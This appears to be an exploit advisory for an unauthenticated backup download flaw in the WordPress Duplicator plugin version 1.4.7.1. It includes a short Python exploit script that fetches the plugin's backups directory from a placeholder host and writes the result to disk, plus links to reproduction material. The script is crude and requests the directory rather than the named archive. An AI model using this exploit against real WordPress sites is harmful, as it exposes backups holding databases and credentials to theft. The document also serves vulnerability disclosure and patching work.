WordPress Duplicator 1.4.7.1 Backup Disclosure

WordPress Duplicator plugin version 1.4.7.1 suffers from a backup disclosure vulnerability.


SHA-256 | 8c02cb423eea46b383d67be17314d3d5a18adc9b995ddc621d23b0a2589b797a

## Title: WordPress Plugin Duplicator 1.4.7.1 - Unauthenticated Backup Download
## Author: nu11secur1ty
## Date: 08.08.2022
## Vendor: https://wordpress.org/
## Software: https://wordpress.org/plugins/duplicator/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1



## Description:
The WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated
Backup Download, after an update from the 1.4.7 version.
The attacker can download all archive information from the system by
using this vulnerability!

Status: CRITICAL

[+] Exploit:

```python
#!/usr/bin/python
# Author nu11secur1ty
import requests
import time

vulnerableURL = "http://pwned_host.com/wordpress/wp-content/backups-dup-lite/"
archive=input("Give the name of the archive...\n")
response = requests.get(vulnerableURL)
time.sleep(5)
open(archive, "wb").write(response.content)
print("Right now, you just downloaded the secret archive =)\n")

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1)

## Proof and Exploit:
[href](https://streamable.com/ee11bg)


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

Related Posts